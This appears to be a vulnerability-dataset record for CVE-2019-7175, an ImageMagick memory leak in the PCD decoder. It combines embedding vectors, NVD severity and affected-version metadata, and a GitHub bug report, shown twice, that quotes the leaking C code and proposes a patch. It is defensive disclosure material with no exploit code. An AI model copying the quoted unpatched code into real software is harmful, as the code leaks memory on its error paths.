-0.016229309141635895, 0.007376594003289938, 0.021660471335053444, 0.0004820959293283522, 0.023136593401432037, -0.04033661261200905, 0.006237413734197617, -0.005326871760189533, 0.0008328250842168927, -0.001083023613318801, 0.006546276155859232, 0.0007536039338447154, -0.0028299004770815372, -0.021692560985684395, 0.00936213694512844, -0.01495374832302332, -0.004540676716715097, -0.001549325417727232, -0.023746294900774956, -0.024853385984897614, -0.004669034853577614, -0.021259352564811707, 0.011985461227595806, -0.0011211299570277333, 0.009305980987846851, -0.024708982557058334, -0.009017174132168293, -0.0011782895307987928, -0.007176034152507782, -0.009474450722336769, 0.005098233465105295, 0.0057480474933981895, -0.00277976063080132, -0.014857479371130466, 0.011255422607064247, 0.035458993166685104, 0.007765680551528931, -0.003313249908387661, -0.018916811794042587, 0.005832282826304436, 0.027003388851881027, -0.0010198472300544381, -0.001330715138465166, 0.007717546075582504, -0.006646555848419666, 0.006502152886241674, 0.0079662399366498, 0.016798898577690125, 0.022831741720438004, 0.004291982389986515, 0.016445914283394814, -0.0008934944635257125, 0.006028831470757723, -0.01695934683084488, 0.054680656641721725, 0.012426692992448807, -0.007256258279085159, 0.00012829568004235625, 0.007356537971645594, -0.002348556648939848, 0.011784900911152363, 0.0014049222227185965, -0.026489954441785812, 0.017825765535235405, 0.01035691425204277, 0.010974639095366001, -0.0005380020011216402, -0.000504909607116133, -0.002019638428464532, 0.019783230498433113, 0.014392180368304253, 0.0007546067354269326, 0.008752435445785522, -0.0036040619015693665, -0.005848327651619911, -0.006843104492872953, 0.02167651616036892, 0.00004901183274341747, 0.0036542017478495836, -0.0050581214018166065, -0.004324072040617466, 0.000059008489188272506, -0.0027917942497879267, -0.005194501951336861, 0.006923328619450331, 0.002577194944024086, -0.007308403495699167, 0.012811767868697643, -0.005663812160491943, 0.006084988359361887, -0.0015433086082339287, 0.014167552813887596, 0.012811767868697643, 0.00872836820781231, -0.003951030317693949, -0.016133040189743042, -0.008672211319208145, 0.012827812694013119, -0.012731543742120266, -0.010790123604238033, -0.013244977220892906, 0.015106173232197762, 0.0010729955974966288, 0.007027619984000921, -0.02830301597714424, 0.007577153854072094, -0.011680610477924347, -0.0023425398394465446, -0.004009192809462547, 0.010822213254868984, 0.0005971671780571342, 0.02883249521255493, -0.020168306306004524, -0.006249447353184223, -0.006145155988633633, 0.0009401246788911521, 0.021628381684422493 ]
1,766
CVE-2019-7175
2019-03-07T23:29:01.597000
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/1e6a3ace073c9ec9c71e439c111d23c6e66cb6ae" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1450" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1450
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> memory leak in DecodeImage in coders/pcd.c, which is different from #1193 and #811 ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The critical code snippet is: https://github.com/ImageMagick/ImageMagick/blob/master/coders/pcd.c#L198 ```c for (i=0; i < (image->columns > 1536 ? 3 : 1); i++) { PCDGetBits(8); length=(sum & 0xff)+1; pcd_table[i]=(PCDTable *) AcquireQuantumMemory(length, //line 202 sizeof(*pcd_table[i])); if (pcd_table[i] == (PCDTable *) NULL) //line 204 { buffer=(unsigned char *) RelinquishMagickMemory(buffer); ThrowBinaryException(ResourceLimitError,"MemoryAllocationFailed", //line 207 image->filename); } r=pcd_table[i]; for (j=0; j < (ssize_t) length; j++) { PCDGetBits(8); r->length=(unsigned int) (sum & 0xff)+1; if (r->length > 16) //line 215 { buffer=(unsigned char *) RelinquishMagickMemory(buffer); return(MagickFalse); //line 218 } PCDGetBits(16); r->sequence=(unsigned int) (sum & 0xffff) << 16; PCDGetBits(8); r->key=(unsigned char) (sum & 0xff); r->mask=(~((1U << (32-r->length))-1)); r++; } pcd_length[i]=(size_t) length; } ``` **pcd_table[i]** is allocated at *line 202*, however, **pcd_table[0~i]** are forgot to be freed when exception happens at line *204* or function returns at *line 215*. **pcd_table** is a local array variable and it isn't passed to the caller function when DecodeImage returns with MagickFalse at *line 207 and 218*. As a result, the allocated memory pcd_table[0~(i-1)] (or pcd_table[0~i] when returned at line 218) will not be freed and memory leak happens. The max size of leaked memory is 3*(0xff+1)*sizeof(*pcd_table[0]) The patch suggestion: ```c if (pcd_table[i] == (PCDTable *) NULL) //line 204 { buffer=(unsigned char *) RelinquishMagickMemory(buffer); for (k=0; k < i; k++) pcd_table[k] = (PCDTable *)RelinquishMagickMemory(pcd_table[k]); ThrowBinaryException(ResourceLimitError,"MemoryAllocationFailed", image->filename); } if (r->length > 16) { buffer=(unsigned char *) RelinquishMagickMemory(buffer); for (k=0; k <= i; k++) pcd_table[k] = (PCDTable *)RelinquishMagickMemory(pcd_table[k]); return(MagickFalse); } ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE
memory leak in DecodeImage in coders/pcd.c different from #1193 and #811
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1450/comments
3
2019-01-17T02:37:57
2019-03-11T01:54:24Z
https://github.com/ImageMagick/ImageMagick/issues/1450
400,085,839
1,450
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : memory leak in DecodeImage in coders/pcd.c different from #1193 and #811 Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> memory leak in DecodeImage in coders/pcd.c, which is different from #1193 and #811 ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> The critical code snippet is: https://github.com/ImageMagick/ImageMagick/blob/master/coders/pcd.c#L198 ```c for (i=0; i < (image->columns > 1536 ? 3 : 1); i++) { PCDGetBits(8); length=(sum & 0xff)+1; pcd_table[i]=(PCDTable *) AcquireQuantumMemory(length, //line 202 sizeof(*pcd_table[i])); if (pcd_table[i] == (PCDTable *) NULL) //line 204 { buffer=(unsigned char *) RelinquishMagickMemory(buffer); ThrowBinaryException(ResourceLimitError,"MemoryAllocationFailed", //line 207 image->filename); } r=pcd_table[i]; for (j=0; j < (ssize_t) length; j++) { PCDGetBits(8); r->length=(unsigned int) (sum & 0xff)+1; if (r->length > 16) //line 215 { buffer=(unsigned char *) RelinquishMagickMemory(buffer); return(MagickFalse); //line 218 } PCDGetBits(16); r->sequence=(unsigned int) (sum & 0xffff) << 16; PCDGetBits(8); r->key=(unsigned char) (sum & 0xff); r->mask=(~((1U << (32-r->length))-1)); r++; } pcd_length[i]=(size_t) length; } ``` **pcd_table[i]** is allocated at *line 202*, however, **pcd_table[0~i]** are forgot to be freed when exception happens at line *204* or function returns at *line 215*. **pcd_table** is a local array variable and it isn't passed to the caller function when DecodeImage returns with MagickFalse at *line 207 and 218*. As a result, the allocated memory pcd_table[0~(i-1)] (or pcd_table[0~i] when returned at line 218) will not be freed and memory leak happens. The max size of leaked memory is 3*(0xff+1)*sizeof(*pcd_table[0]) The patch suggestion: ```c if (pcd_table[i] == (PCDTable *) NULL) //line 204 { buffer=(unsigned char *) RelinquishMagickMemory(buffer); for (k=0; k < i; k++) pcd_table[k] = (PCDTable *)RelinquishMagickMemory(pcd_table[k]); ThrowBinaryException(ResourceLimitError,"MemoryAllocationFailed", image->filename); } if (r->length > 16) { buffer=(unsigned char *) RelinquishMagickMemory(buffer); for (k=0; k <= i; k++) pcd_table[k] = (PCDTable *)RelinquishMagickMemory(pcd_table[k]); return(MagickFalse); } ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 - Additional information: <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu at VARAS of IIE --- end body ---
3,694
[ -0.035735927522182465, 0.01117964368313551, -0.007884152233600616, 0.01163155771791935, 0.00148610002361238, 0.03676489740610123, -0.006184262223541737, 0.030646685510873795, 0.004581707529723644, 0.06546488404273987, 0.005117050837725401, -0.02897808328270912, 0.0034606142435222864, 0.006187738385051489, 0.0029270087834447622, -0.0020318725146353245, -0.004567802418023348, 0.020162293687462807, -0.04335588216781616, -0.03915656358003616, 0.007015087641775608, -0.02024572342634201, -0.027935205027461052, 0.021205170080065727, -0.0011237002909183502, 0.018451975658535957, 0.012020898051559925, -0.012563194148242474, 0.013168063014745712, 0.009434563107788563, 0.04599783942103386, 0.023207494989037514, -0.011902705766260624, -0.0023464737460017204, 0.005468152929097414, -0.013870267197489738, 0.03682051971554756, 0.04482981562614441, 0.019383611157536507, -0.017562052235007286, 0.0011523793218657374, -0.0449688658118248, -0.015434583649039268, 0.012389381416141987, -0.013585214503109455, -0.018883030861616135, -0.0077937692403793335, -0.029951434582471848, -0.04424580559134483, 0.02245662361383438, 0.02312406525015831, -0.02484828792512417, -0.01096411608159542, -0.04088078811764717, 0.0184380691498518, -0.00869759637862444, 0.027893489226698875, 0.0608484111726284, 0.016004689037799835, 0.0423269122838974, -0.006577079184353352, 0.06435247510671616, 0.020426489412784576, 0.011972230859100819, 0.003399779787287116, 0.012041755951941013, -0.048806656152009964, 0.03175908699631691, 0.020746305584907532, 0.005920066498219967, -0.0122920460999012, -0.04249377176165581, 0.011742797680199146, 0.04738834127783775, 0.03659803792834282, 0.0033580646850168705, 0.0546189583837986, 0.018730076029896736, -0.006340693682432175, 0.02757367491722107, -0.031786900013685226, 0.04769425094127655, 0.0001876092719612643, 0.04168727993965149, 0.04099202901124954, -0.011527270078659058, -0.043328072875738144, -0.058345504105091095, 0.004567802418023348, -0.007307093124836683, 0.0039976960979402065, 0.0284775011241436, 0.019272372126579285, -0.02260957844555378, -0.012194711714982986, -0.0021883039735257626, -0.05370122566819191, -0.023082349449396133, -0.043828655034303665, -0.006086926907300949, -0.037960730493068695, -0.016282789409160614, -0.017589863389730453, 0.00228563928976655, 0.017812343314290047, -0.004056792706251144, -0.010713825933635235, -0.04608127102255821, 0.02508467435836792, 0.10996097326278687, 0.008176157251000404, 0.011249168775975704, -0.026363937184214592, -0.0023325688671320677, 0.012896914966404438, 0.03679271042346954, 0.014878381974995136, -0.02480657398700714, -0.05723310261964798, -0.016143739223480225, -0.013049870729446411, -0.06479743868112564, -0.005798397585749626, 0.03276025131344795, -0.009976859204471111, 0.0454416386783123, 0.0012792627094313502, -0.03606964647769928, -0.025932880118489265, -0.0024872622452676296, -0.002475095447152853, -0.0454416386783123, 0.010908495634794235, -0.025015149265527725, 0.007174995262175798, -0.014210940338671207, 0.0063685039058327675, 0.05183795094490051, 0.007077660411596298, 0.0028001253958791494, -0.03556906804442406, -0.041214507073163986, 0.017701102420687675, -0.006354598794132471, -0.026447366923093796, 0.01866055093705654, -0.052839115262031555, 0.0323709100484848, 0.001939751673489809, 0.018465880304574966, -0.019884193316102028, -0.02049601450562477, 0.004560849629342556, -0.011944420635700226, 0.022414907813072205, -0.01631060056388378, 0.01096411608159542, 0.02967333421111107, -0.016546985134482384, -0.013091585598886013, -0.04346712306141853, -0.010929353535175323, 0.034150753170251846, 0.012264236807823181, 0.004001172259449959, -0.0026454320177435875, -0.01215299591422081, 0.021330315619707108, -0.008210919797420502, 0.014516850933432579, 0.022234143689274788, 0.01934189721941948, 0.020009338855743408, 0.0009073031833395362, -0.03629212826490402, -0.010762493126094341, 0.005464676767587662, -0.027726629748940468, -0.012514526955783367, -0.04051925614476204, 0.029562093317508698, 0.01448904164135456, -0.011652414686977863, 0.009385894984006882, 0.03595840930938721, -0.02444504201412201, 0.02522372454404831, 0.012876057997345924, 0.002042301231995225, -0.0015373749192804098, -0.0012071303790435195, -0.016769466921687126, 0.023360449820756912, -0.01999543234705925, 0.03554125502705574, 0.009128652513027191, -0.04719367250800133, -0.010998878628015518, 0.007786816917359829, -0.011784512549638748, 0.026071930304169655, -0.016519175842404366, -0.03228747844696045, 0.010345342569053173, -0.012730054557323456, 0.003587497631087899, -0.016491364687681198, -0.01006724126636982, 0.0132653983309865, -0.022804249078035355, -0.002261305460706353, -0.0022734724916517735, 0.014349990524351597, -0.011527270078659058, -0.019300181418657303, 0.0059583052061498165, 0.0046790423803031445, 0.012180806137621403, 0.0013487879186868668, 0.004484372213482857, 0.014308275654911995, -0.02076021023094654, 0.02732338383793831, -0.0074530960991978645, -0.03556906804442406, -0.04482981562614441, 0.006820417009294033, -0.014447325840592384, -0.0569550022482872, 0.0004831997794099152, 0.051281750202178955, -0.040018677711486816, -0.003949028439819813, -0.01686680130660534, -0.006267692428082228, -0.029450854286551476, -0.0031460130121558905, -0.025376679375767708, -0.02141374535858631, -0.009594470262527466, 0.027086999267339706, 0.03056325577199459, -0.024125227704644203, -0.0077937692403793335, 0.02612755075097084, 0.04872322455048561, -0.03253776952624321, -0.02886684238910675, -0.0046581849455833435, 0.014572471380233765, 0.04797235503792763, -0.022762533277273178, -0.008071869611740112, -0.035096295177936554, 0.01619935967028141, 0.003316349582746625, 0.0350128635764122, 0.012201664038002491, -0.01660260558128357, -0.0457475483417511, 0.011054499074816704, -0.0051935287192463875, -0.017409097403287888, -0.004039410967379808, 0.03648679703474045, -0.001145426882430911, -0.010748588480055332, 0.025390584021806717, 0.003928171005100012, -0.013550451956689358, 0.021886516362428665, -0.05308940261602402, 0.005238720215857029, -0.02454237826168537, 0.002930485177785158, 0.008287398144602776, 0.0017442122334614396, 0.0011515102814882994, -0.01385636255145073, -0.002040563151240349, 0.004755520261824131, 0.005756682250648737, -0.03303835168480873, 0.025960691273212433, -0.006340693682432175, -0.00594440009444952, 0.01829901896417141, -0.029033701866865158, -0.035596877336502075, -0.002019705483689904, -0.016435746103525162, 0.033761411905288696, -0.01920284703373909, 0.018062634393572807, 0.011137928813695908, -0.018132159486413002, -0.021622322499752045, 0.0015625777887180448, -0.05014153942465782, -0.012994250282645226, -0.03445666283369064, -0.018771789968013763, -0.01971733197569847, 0.021580606698989868, -0.028143780305981636, 0.02953428402543068, -0.029756763949990273, -0.0013209778117015958, 0.014586376026272774, -0.026447366923093796, 0.02142765186727047, -0.02363855019211769, 0.0203847736120224, -0.0418541394174099, -0.020482109859585762, 0.003552735084667802, 0.017715008929371834, -0.016755560413002968, 0.013154158368706703, 0.015518013387918472, -0.0055237733758986, 0.0022421861067414284, -0.027615388855338097, 0.014961812645196915, 0.060681551694869995, 0.007209757808595896, -0.010032478719949722, 0.07853560894727707, -0.03631993755698204, 0.028839031234383583, -0.0014495993964374065, -0.012159948237240314, -0.005808826070278883, 0.0014522065175697207, 0.027073092758655548, -0.0304242055863142, -0.039907436817884445, 0.059124186635017395, 0.021358126774430275, 0.01736738160252571, -0.042020998895168304, 0.006375456228852272, 0.0019832048565149307, -0.03529096767306328, 0.05147642269730568, -0.016143739223480225, -0.01057477481663227, 0.001724223722703755, 0.014961812645196915, -0.011151834391057491, 0.0009446729673072696, 0.026600321754813194, -0.015100862830877304, 0.038071971386671066, 0.04597003012895584, 0.02689232863485813, -0.016254980117082596, -0.01292472518980503, 0.028324546292424202, -0.004195842891931534, 0.0021848278120160103, -0.05592602863907814, 0.013133300468325615, 0.02287377417087555, 0.035096295177936554, 0.03484600409865379, 0.006305931136012077, 0.002207423560321331, -0.011318694800138474, 0.010275817476212978, -0.019647806882858276, 0.057288724929094315, -0.039239995181560516, 0.022818153724074364, -0.023054540157318115, -0.02808815985918045, 0.024987338110804558, 0.020176198333501816, -0.02808815985918045, 0.01669994182884693, -0.0112422164529562, 0.03309397026896477, 0.03459571301937103, -0.03565249592065811, 0.00790500920265913, 0.0163384098559618, -0.03125850856304169, 0.039657145738601685, -0.004849379416555166, -0.04060268774628639, -0.03281586989760399, 0.01535115297883749, -0.039239995181560516, -0.039267804473638535, -0.004856331739574671, 0.055592309683561325, 0.0015625777887180448, -0.020217914134263992, 0.02654470130801201, -0.06463057547807693, -0.0030677972827106714, -0.02742071822285652, 0.01935580186545849, -0.011777560226619244, 0.00175464095082134, 0.03342769294977188, 0.036236509680747986, -0.0231101606041193, 0.009274655021727085, -0.002049253787845373, 0.009059127420186996, -0.010373152792453766, -0.03595840930938721, 0.039406854659318924, 0.027851775288581848, 0.02782396413385868, 0.008280444890260696, 0.010248007252812386, 0.0020961833652108908, 0.023360449820756912, -0.01607421413064003, 0.015198198147118092, -0.00796758197247982, 0.025195913389325142, 0.012980345636606216, -0.026210982352495193, 0.030396396294236183, 0.01462809182703495, 0.009837809018790722, -0.002687147120013833, -0.04755520075559616, 0.013606071472167969, 0.002464666496962309, 0.017464717850089073, -0.016171550378203392, -0.02455628290772438, -0.027935205027461052, -0.020579444244503975, -0.003969885874539614, 0.0015486726770177484, 0.027114808559417725, 0.015837829560041428, -0.004032458644360304, -0.00483547430485487, -0.011728893034160137, -0.031147267669439316, -0.039629336446523666, 0.012180806137621403, -0.005450771655887365, -0.026753278449177742, -0.03879503533244133, 0.04538601636886597, -0.010303626768290997, -0.04555287957191467, 0.03317740187048912, -0.001302727498114109, -0.05028058961033821, -0.029339613392949104, 0.024639712646603584, -0.006994230207055807, -0.008245682343840599, 0.021983852609992027, -0.020051052793860435, -0.001356609514914453, 0.006577079184353352, 0.02235928736627102, 0.017993109300732613, -0.006000020541250706, 0.012132138945162296, -0.01974514313042164, 0.036097459495067596, 0.015879543498158455, 0.008176157251000404, 0.004550421144813299, -0.02247052825987339, 0.01802091859281063, 0.03409513458609581, -0.010449630208313465, 0.02352731116116047, -0.06585422158241272, -0.001724223722703755, -0.054285235702991486, -0.06307321786880493, -0.01579611375927925, 0.027462434023618698, 0.01039400976151228, 0.013355781324207783, -0.01482276152819395, -0.008787979371845722, 0.00920512992888689, 0.021594511345028877, 0.027782250195741653, -0.027379004284739494, -0.014920096844434738, 0.0035701163578778505, 0.00754347862675786, -0.03904532268643379, -0.022289762273430824, 0.017186617478728294, 0.0015999474562704563, 0.0224844329059124, -0.022261952981352806, 0.022943299263715744, 0.01827120967209339, 0.02758757956326008, -0.035068485885858536, -0.011263074353337288, 0.007216710597276688, -0.007001182530075312, -0.031008217483758926, 0.031675659120082855, -0.03523534536361694, -0.011033641174435616, -0.038350071758031845, 0.006942086387425661, -0.03935123607516289, 0.02953428402543068, -0.006410218775272369, 0.01829901896417141, 0.003667451674118638, -0.01778453402221203, 0.01857711933553219, 0.02522372454404831, 0.04207662120461464, 0.013613024726510048, 0.020857544615864754, 0.02719823829829693, 0.024083511903882027, 0.03985181450843811, -0.03320521116256714, 0.03631993755698204, -0.008245682343840599, -0.014419515617191792, 0.004675566218793392, 0.016115929931402206, 0.03242652863264084, 0.016755560413002968, 0.015712684020400047, -0.021580606698989868, 0.014294371008872986, -0.0049988580867648125, 0.03209280967712402, -0.002068373141810298, 0.00334763596765697, -0.024987338110804558, 0.01476714201271534, -0.008398638106882572, 0.029979243874549866, -0.0048737130127847195, -0.027796154841780663, 0.006587508134543896, -0.016129834577441216, -0.008120537735521793, 0.00578449247404933, -0.020454298704862595, 0.004289701581001282, 0.025960691273212433, -0.0018458927515894175, 0.010929353535175323, 0.0028540072962641716, -0.02469533309340477, -0.0008177895797416568, 0.02077411487698555, 0.010866780765354633, -0.014850571751594543, -0.024862194433808327, 0.006730034481734037, 0.014217892661690712, -0.044106755405664444, -0.03673708811402321, 0.013849410228431225, -0.009177319705486298, 0.0069177523255348206, 0.0051205274648964405, -0.015114767476916313, 0.019022081047296524, 0.03262120112776756, 0.004380084574222565, -0.019703427329659462, -0.02156670205295086, 0.02611364610493183, -0.01738128811120987, 0.0036744042299687862, 0.03882284462451935, 0.006118213292211294, -0.02639174647629261, 0.013647787272930145, -0.010310580022633076, -0.001967561664059758, -0.03111945651471615, 0.02819940075278282, 0.022818153724074364, 0.022971108555793762, 0.00774510158225894, 0.008183110505342484, -0.003455400001257658, 0.008683690801262856, 0.0015773518243804574, 0.01561534870415926, 0.006396313663572073, -0.011360409669578075, 0.017339572310447693, 0.001830249559134245, -0.03662584722042084, -0.02416694164276123, -0.004261891823261976, 0.0021344220731407404, -0.03125850856304169, -0.004668613895773888, 0.0021153027191758156, 0.0035405682865530252, 0.012632720172405243, 0.01998152770102024, 0.00782853178679943, 0.027128713205456734, -0.003608355298638344, 0.03401170298457146, -0.01188880018889904, -0.02611364610493183, -0.0011888800654560328, 0.034039512276649475, -0.06201643496751785, 0.00029635094688273966, -0.004119365010410547, -0.0110475467517972, 0.0296455230563879, -0.029868004843592644, -0.027267763391137123, -0.023819316178560257, -0.034706953912973404, -0.005238720215857029, 0.013258446007966995, 0.0373489111661911, -0.02076021023094654, -0.03779387101531029, 0.02928399294614792, 0.014655901119112968, -0.011659367941319942, -0.004282749257981777, -0.01464199647307396, -0.024389423429965973, 0.024778762832283974, -0.009420657530426979, 0.0044426568783819675, -0.022776439785957336, -0.023429974913597107, -0.00738357100635767, 0.023485595360398293, 0.003990743774920702, -0.0012592743150889874, -0.04007429629564285, 0.016630416736006737, 0.014280465431511402, 0.028115971013903618, 0.0024055701214820147, -0.027476338669657707, 0.0365702286362648, 0.043328072875738144, 0.007067231461405754, -0.023847125470638275, 0.005290864035487175, 0.005770587362349033, -0.023040635511279106, -0.011652414686977863, 0.04338369518518448, -0.007619956508278847, 0.002607193076983094, 0.004685995168983936, 0.030479826033115387, 0.0052248151041567326, 0.010609538294374943, 0.004067221190780401, 0.009712663479149342, 0.022373193874955177, -0.015879543498158455, -0.021664036437869072, 0.006789131090044975, 0.015434583649039268, -0.01078335102647543, 0.013432258740067482, -0.0005701062036678195, -0.043439313769340515, 0.007279283367097378, -0.016894610598683357, 0.0011741059133782983, 0.017534242942929268, -0.00791196245700121, -0.004098507575690746, -0.018201684579253197, -0.021080024540424347, 0.05161547288298607, -0.01984247751533985, 0.031953759491443634, -0.010248007252812386, 0.002231757389381528, -0.006055640522390604, 0.00483199767768383, 0.0018910840153694153, -0.01973123662173748, -0.01371035911142826, -0.0357915461063385, 0.027253858745098114, -0.0008095334633253515, 0.03851693123579025, -0.03295492008328438, 0.018243398517370224, -0.003855169517919421, 0.009066079743206501, 0.0011089261388406157, 0.01592125929892063, -0.02220633253455162, -0.0022943299263715744, -0.027935205027461052, 0.0006448457716032863, -0.0008117061224766076, -0.019619997590780258, -0.016143739223480225, -0.01660260558128357, -0.005078812129795551, -0.019105510786175728, -0.015504108741879463, -0.022275857627391815, -0.019258465617895126, -0.059624768793582916, 0.023694170638918877, 0.004501753486692905, -0.00009592298010829836, 0.01594906859099865, 0.01764548383653164, 0.014725427143275738, -0.03682051971554756, -0.00862111896276474, -0.013334923423826694, 0.002734076464548707, 0.0039976960979402065, 0.0194531362503767, 0.005214386153966188, -0.0021604939829558134, 0.02575211599469185, 0.017923584207892418, 0.011388219892978668, -0.004025506321340799, 0.00584706524387002, -0.020940974354743958, 0.005753206089138985, -0.01005333662033081, 0.011617652140557766, 0.007439190987497568, -0.027128713205456734, 0.01803482323884964, 0.02611364610493183, 0.01892474666237831, 0.03109164722263813, -0.02091316506266594, -0.007557383738458157, 0.0034380187280476093, 0.005555059295147657, -0.018382448703050613, 0.03645898774266243, -0.002125731436535716, 0.005228291265666485, -0.007077660411596298, -0.009761330671608448, 0.0203847736120224, 0.023596836254000664, 0.0028296737000346184, 0.03720986098051071, -0.015990784391760826, 0.00663269916549325, 0.01683899201452732, 0.01829901896417141, -0.009740473702549934, -0.0007756399572826922, 0.0017172711668536067, 0.016644321382045746, -0.05486924946308136, 0.010984973981976509, 0.0342341847717762, 0.009490182623267174, 0.01621326431632042, 0.00460951728746295, 0.013682549819350243, -0.026600321754813194, 0.04980781674385071, 0.02650298736989498, -0.011346504092216492, 0.021747466176748276, 0.017589863389730453, -0.039629336446523666, 0.024890003725886345, -0.017464717850089073, -0.023596836254000664, 0.06123775243759155, -0.013293208554387093, -0.012201664038002491, -0.04321683198213577, 0.008739311248064041, -0.018591025844216347, -0.0027723154053092003, -0.03420637547969818, -0.0014843619428575039, 0.0012036541011184454, -0.020565539598464966, -0.024876099079847336, -0.028644362464547157, -0.01699194684624672, -0.010818113572895527, 0.019258465617895126, -0.019564377143979073, 0.03515191748738289, 0.015156482346355915, 0.006455410271883011, 0.007731196470558643, 0.023165779188275337, 0.028505312278866768, -0.002044039312750101, -0.01357826218008995, -0.014892286621034145, -0.0002920056285802275, -0.024737048894166946, -0.026433462277054787, 0.0215527955442667, 0.025946786627173424, -0.032454341650009155, -0.03203718736767769, 